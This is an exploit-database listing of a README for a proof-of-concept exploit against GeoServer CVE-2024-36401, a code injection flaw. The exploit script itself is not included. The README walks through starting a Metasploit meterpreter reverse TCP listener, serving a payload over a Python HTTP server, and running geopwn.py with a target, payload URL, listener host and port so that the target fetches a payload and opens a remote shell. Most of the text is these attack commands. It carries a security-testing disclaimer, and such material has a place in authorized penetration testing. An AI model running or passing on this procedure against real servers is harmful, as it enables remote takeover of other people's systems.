Exploit for Code Injection in Geoserver CVE-2024-36401

## https://sploitus.com/exploit?id=90DE6307-8FEB-54DD-AD6A-6D61568E82CC
# CVE-2024-36401-PoC<br>
Proof-of-Concept Exploit for CVE-2024-36401 GeoServer<br>
Vulnerable Versions of GeoServer are prior to 2.23.6 | 2.24.4 | 2.25.2<br>

!!! FOR SECURITY TESTING PURPOSES ONLY !!! <br>
\******************************************************<br>
DO NOT USE THIS ON SYSTEMS THAT YOU DO NOT <br>
OWN UNLESS YOU HAVE EXPRESS PERMISSION !!!

To run...
1. Start a listener in Metasploit
   - ```
     msf6 > use exploit/multi/handler
     msf6 > exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
     msf6 > exploit(multi/handler) > set LHOST 10.10.10.1 <--(set to your IP)
     msf6 > exploit(multi/handler) > set LPORT 1234 <--(you can leave default, or change to your preference)
     msf6 > exploit(multi/handler) > run

     [*] Started reverse TCP handler on 10.10.10.1:1234

      ```
2. Start HTTP server with Python
   - ```
     hacker@kali~> python3 -m http.server
     Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
     ```
3. Run exploit
   - ```
     hacker@kali~> python3 ./geopwn.py <target_domain_or_IP> <payload_URL> <LHOST> <LPORT>
     ```